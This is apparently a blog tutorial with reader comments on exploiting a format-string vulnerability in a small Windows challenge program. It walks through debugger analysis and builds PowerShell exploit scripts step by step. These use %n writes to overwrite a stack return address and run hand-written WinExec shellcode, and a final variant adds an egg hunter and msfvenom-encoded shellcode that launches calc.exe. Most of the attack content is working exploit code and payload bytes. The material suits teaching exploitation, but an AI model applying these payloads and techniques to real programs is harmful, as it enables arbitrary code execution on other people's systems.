I thought of making a small challenge in exploiting format strings in Windows. This is how it looks, it asks for a filename to open. At first this might be a bit confusing. There’s no vulnerable functions in reading a file. You can see that our first argument to the program is echoed back in the program.
Let’s investigate this inside a debugger. As you can see if argc == 2 the application continues the flow and argv[1] is passed into that function highlighted.
Inside that function memset is used fill the memory with zeros and strncpy is used to copy the user input inside the filled buffer space. But if you notice eax is directly called by the printf function without specifying any format string parameter. The function printf will directly call our buffer. This is quite interesting ?
Let’s try to read the stack using the %X format string which is used to display text in hex format. As you can see printf function read the stack from high memory to low memory.
I will give 80 A characters and a bunch of %x format strings and see the output.
You can see 41 which means hex A and 2558 which is %X.
We can use %n to display the number of characters written so far in a string up to the offset %n is placed. We must pass the address of the variable. Basically, this will write to a memory location. For example,
1 2 3 4 5 |
int main() { int number; printf("Hello %nWorld", &number); printf("%d", number); } |
This will print the value 6.
So, let’s try placing a %n in the input and see what happens.
The program crashed while trying to write to an address. Let’s see what happened inside the debugger.
This is the place where things go messed up. The value of ECX is moved into the address pointed at EAX.
Let’s check the registers. EAX contains 78257825 which is “x%x%” and ECX contains f8.
Let’s examine the stack. If we go down the stack, we can see our injected characters on the stack. This might give you a nice idea to place the shellcode instead of the ‘A’ characters?
At the end of the function epilogue once it hits RET, EIP would point to the return address from the previous function on the stack.
If we check the call stack, we can see the first frame pointer which points to 0019f72c
The return address would be 0019f730 which points to 00401188 of the previous function. If you notice 0019f730 address got a null byte in front. But this won’t be an issue if we write this address at the end of our payload in little-endian format ?
Here’s the plan. We can control ECX and EAX in this scenario. We can write the address of shellcode inside ECX and the pointer to the return address inside the EAX register. Once the program hits “mov dword ptr [eax],ecx” the address of shellcode will be written in the return address on the stack. When the program reaches the end of the function and hits the epilogue LEAVE, RET the EIP will point to our newly written address which points to our shellcode ?
Alright, the plan sounds cool, let’s try to implement this and try out.
First, we should point EAX to our return address. My first payload was something like this. Like in the previous image the EAX contains 78257825 which is “x%x%”.
1 2 3 4 5 6 |
$Buffer = 'A' * 80 $fmt = '%x' * 21 + '%n' $ret = 'B' * 4 $final = $Buffer + $fmt + $ret Start-Process ./fmt.exe -ArgumentList $final |
We must keep experimenting and see till EAX points to our 4 B characters. I kept increasing the “%x” characters finally got EAX pointing to “BBBB”. So, the next payload I tried was this.
1 2 3 4 5 6 |
$Buffer = 'A' * 80 $fmt = '%x' * 41 + '%n' $ret = 'B' * 4 $final = $Buffer + $fmt + $ret Start-Process ./fmt.exe -ArgumentList $final |
Let’s try to control the ECX register by making it point to our address of shellcode. As in the previous image our shellcode is located at 0019f758. Let’s divide this number by 4.
0x0019f758/4 = 425430
Let’s give this value to the format string %x, this will change the value of ECX. At the same time, I am going to increase the %x characters from 41 to 51 to make EAX point to our Bs. This %x reads 2 characters at once. We must keep experimenting till we reach our goals ?
1 2 3 4 5 6 |
$Buffer = 'A' * 80 $fmt = '%x' * 51 + '%.425430x' * 4 +'%n' $ret = 'B' * 4 $final = $Buffer + $fmt + $ret Start-Process ./fmt.exe -ArgumentList $final |
Now ECX points to 0019f940, but we need ECX pointed to 0019f758.
Let’s find the difference and try again.
0x0019f940 – 0x0019f758 = 488
By adding 408 to our last format string we should get somewhere close to our goal. Let’s try it out.
425430 + 488 = 425918
1 2 3 4 5 6 |
$Buffer = 'A' * 80 $fmt = '%x' * 51 + '%.425430x' * 3 + '%.425918x' +'%n' $ret = 'B' * 4 $final = $Buffer + $fmt + $ret Start-Process ./fmt.exe -ArgumentList $final |
Now ECX points to 19fb28. Let’s again find the difference.
0x19fb28 – 0x19f758 = 976
By subtracting the difference from the last format string, we should get ECX pointing to the exact address we need.
425918 - 949 = 424942
1 2 3 4 5 6 |
$Buffer = 'A' * 80 $fmt = '%x' * 51 + '%.425430x' * 3 + '%.424942x' +'%n' $ret = 'B' * 4 $final = $Buffer + $fmt + $ret Start-Process ./fmt.exe -ArgumentList $final |
Now ECX points to 19f758 which is the location we are going to place our shellcode.
Since we have 80 A characters I will first try to write my own shellcode to pop a calc. Because if I again increase the number of A characters it would be a pain to calculate offsets. I will use the WinExec API to call the calc. Let’s find the address of it.
This is a simple asm code that I’ve written to call the WinExec API.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
format PE GUI 4.0 entry ShellCode include 'win32ax.inc' ; Author: @OsandaMalith section '.code' executable readable writeable ShellCode: push ebp mov ebp, esp xor edi, edi push edi mov byte [ebp-04h], 'c' mov byte [ebp-03h], 'a' mov byte [ebp-02h], 'l' mov byte [ebp-01h], 'c' mov dword [esp+4], edi mov byte [ebp-08h], 01h lea eax, [ebp-04h] push eax mov eax, 75263640h call eax |
This is our final exploit.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
<# # Author: @OsandaMalith # Website: https://osandamalith.com # Format String Exploitation #> $shellcode = [Byte[]] @( 0x55, # push ebp 0x89, 0xE5, # mov ebp, esp 0x31, 0xFF, # xor edi, edi 0x57, # push edi 0xC6, 0x45, 0xFC, 0x63, # mov byte [ebp-04h], 'c' 0xC6, 0x45, 0xFD, 0x61, # mov byte [ebp-03h], 'a' 0xC6, 0x45, 0xFE, 0x6C, # mov byte [ebp-02h], 'l' 0xC6, 0x45, 0xFF, 0x63, # mov byte [ebp-01h], 'c' 0x89, 0x7C, 0x24, 0x04, # mov dword [esp+4], edi 0xC6, 0x45, 0xF8, 0x01, # mov byte [ebp-08h], 01h 0x8D, 0x45, 0xFC, # lea eax, [ebp-04h] 0x50, # push eax 0xB8, 0x40, 0x36, 0x26, 0x75, # mov eax, 75263640h 0xFF, 0xD0 # call eax ) $shellcode += [Byte[]] (0x41) * (80 - $shellcode.Length) $fmt = ([system.Text.Encoding]::ASCII).GetBytes('%x' * 51) + ([system.Text.Encoding]::ASCII).GetBytes('%.425430x' * 3) + ([system.Text.Encoding]::ASCII).GetBytes('%.424942x') + ([system.Text.Encoding]::ASCII).GetBytes('%n') $ret = [System.BitConverter]::GetBytes(0x0019f730) $final = $shellcode + $fmt + $ret $payload = '' ForEach ($i in $final) { $payload += ([system.Text.Encoding]::Default).GetChars($i) } Start-Process ./fmt.exe -ArgumentList $payload |
Let’s have a final look inside the debugger.
The value of ECX 0019f758 is going to be moved inside the pointer to EAX which is 0019f730, which is a stack pointer containing our return address. If we see inside the ECX register it points to our shellcode.
As soon as the function hits return EIP would point to our shellcode ?
Once we run this exploit w00t! we would get our calculator ?
How about we use an egg hunter to find our shellcode? ? One may argue we could use a long jump or we could directly place the shellcode at the beginning. But still I thought of using this for fun and curiosity.
First, I checked the bad chars and I found “\x00\x09\x20” as the bad chars in this program. Here’s the exploit with the egg hunger. Note that the offsets might change in different Windows platforms.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
<# # Author: @OsandaMalith # Website: https://osandamalith.com # Egg hunter for the format string bug #> [Byte[]] $egg = 0x66,0x81,0xca,0xff,0x0f,0x42,0x52,0x6a,0x02,0x58,0xcd,0x2e,0x3c,0x05,0x5a,0x74,0xef,0xb8,0x54,0x30,0x30,0x57,0x8b,0xfa,0xaf,0x75,0xea,0xaf,0x75,0xe7,0xff,0xe7 $shellcode = ([system.Text.Encoding]::ASCII).GetBytes('W00TW00T') #msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f powershell -e x86/alpha_mixed [Byte[]] $shellcode += 0x89,0xe0,0xdd,0xc7,0xd9,0x70,0xf4,0x5a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x43,0x43,0x43,0x43,0x43,0x43,0x37,0x52,0x59,0x6a,0x41,0x58,0x50,0x30,0x41,0x30,0x41,0x6b,0x41,0x41,0x51,0x32,0x41,0x42,0x32,0x42,0x42,0x30,0x42,0x42,0x41,0x42,0x58,0x50,0x38,0x41,0x42,0x75,0x4a,0x49,0x49,0x6c,0x78,0x68,0x4c,0x42,0x55,0x50,0x73,0x30,0x33,0x30,0x61,0x70,0x6c,0x49,0x6b,0x55,0x56,0x51,0x4b,0x70,0x73,0x54,0x6c,0x4b,0x56,0x30,0x56,0x50,0x6c,0x4b,0x32,0x72,0x76,0x6c,0x4e,0x6b,0x71,0x42,0x57,0x64,0x4e,0x6b,0x73,0x42,0x34,0x68,0x44,0x4f,0x48,0x37,0x53,0x7a,0x74,0x66,0x34,0x71,0x39,0x6f,0x4c,0x6c,0x45,0x6c,0x43,0x51,0x73,0x4c,0x76,0x62,0x44,0x6c,0x65,0x70,0x6b,0x71,0x38,0x4f,0x64,0x4d,0x37,0x71,0x7a,0x67,0x59,0x72,0x68,0x72,0x43,0x62,0x42,0x77,0x4e,0x6b,0x50,0x52,0x32,0x30,0x4e,0x6b,0x72,0x6a,0x77,0x4c,0x6e,0x6b,0x52,0x6c,0x57,0x61,0x73,0x48,0x78,0x63,0x72,0x68,0x33,0x31,0x38,0x51,0x30,0x51,0x6e,0x6b,0x70,0x59,0x75,0x70,0x55,0x51,0x4e,0x33,0x6c,0x4b,0x73,0x79,0x46,0x78,0x7a,0x43,0x45,0x6a,0x62,0x69,0x4c,0x4b,0x65,0x64,0x6c,0x4b,0x75,0x51,0x38,0x56,0x50,0x31,0x59,0x6f,0x4c,0x6c,0x59,0x51,0x6a,0x6f,0x76,0x6d,0x63,0x31,0x48,0x47,0x44,0x78,0x4d,0x30,0x42,0x55,0x4c,0x36,0x65,0x53,0x31,0x6d,0x58,0x78,0x55,0x6b,0x31,0x6d,0x71,0x34,0x31,0x65,0x6a,0x44,0x61,0x48,0x6e,0x6b,0x32,0x78,0x51,0x34,0x55,0x51,0x6a,0x73,0x71,0x76,0x6c,0x4b,0x44,0x4c,0x70,0x4b,0x4e,0x6b,0x53,0x68,0x57,0x6c,0x73,0x31,0x49,0x43,0x4e,0x6b,0x74,0x44,0x6e,0x6b,0x76,0x61,0x78,0x50,0x4c,0x49,0x30,0x44,0x76,0x44,0x66,0x44,0x73,0x6b,0x43,0x6b,0x61,0x71,0x53,0x69,0x32,0x7a,0x72,0x71,0x79,0x6f,0x6d,0x30,0x43,0x6f,0x63,0x6f,0x72,0x7a,0x6e,0x6b,0x74,0x52,0x7a,0x4b,0x4e,0x6d,0x31,0x4d,0x43,0x5a,0x55,0x51,0x6e,0x6d,0x4f,0x75,0x38,0x32,0x75,0x50,0x55,0x50,0x65,0x50,0x30,0x50,0x71,0x78,0x65,0x61,0x6c,0x4b,0x52,0x4f,0x6d,0x57,0x79,0x6f,0x4a,0x75,0x4f,0x4b,0x4a,0x50,0x4d,0x65,0x49,0x32,0x73,0x66,0x71,0x78,0x6f,0x56,0x6d,0x45,0x6f,0x4d,0x6f,0x6d,0x39,0x6f,0x4b,0x65,0x75,0x6c,0x45,0x56,0x51,0x6c,0x64,0x4a,0x4d,0x50,0x4b,0x4b,0x79,0x70,0x31,0x65,0x37,0x75,0x4d,0x6b,0x71,0x57,0x76,0x73,0x62,0x52,0x52,0x4f,0x71,0x7a,0x63,0x30,0x62,0x73,0x49,0x6f,0x69,0x45,0x53,0x53,0x51,0x71,0x50,0x6c,0x33,0x53,0x36,0x4e,0x53,0x55,0x70,0x78,0x32,0x45,0x45,0x50,0x41,0x41 $egg += [Byte[]] (0x41) * (80 - $egg.Length) $fmt = ([system.Text.Encoding]::ASCII).GetBytes('%x' * 305) + ([system.Text.Encoding]::ASCII).GetBytes('%.425430x' * 3) + ([system.Text.Encoding]::ASCII).GetBytes('%.424942x') + ([system.Text.Encoding]::ASCII).GetBytes('%n') $ret = [System.BitConverter]::GetBytes(0x0019f730) $final = $egg + $fmt + $shellcode + $ret $payload = '' ForEach ($i in $final) { $payload += ([system.Text.Encoding]::Default).GetChars($i) } Start-Process ./fmt.exe -ArgumentList $payload |
This method of exploitation is compiler dependent. I have experimented this on Embarcadero C++ (Borland C++) and Visual C++ 2000 compilers. In other compilers, the printf function is not the same as these. You can research more on other compilers ?
what is the debugger’s name that you used?
WinDbg
Thnks
For the graphes, is it IDA ?
Yeah IDA
Hey, how did you know that the address of BBB will always be last? is printf in windows acts differently than printf in linux? i mean, usually if you use %n in printf vulnerabilities the address that you want to write should be at the begining no?
Actually the printf function is compiled in different ways in different compilers under Windows 🙂 I kept on adding “%X” till I reach the end of the payload. I added “BBBB” at the end since the return address has null characters.
thanks, I get it now, btw your tutorials are awesome!
Thank you mate 🙂
how did you use nonprintable characters as arguments when running executable in windbg for your last stage of exploit (when you were debugging the working exploit code) with 0x0019f730 (i.e. how did you input this in windbg)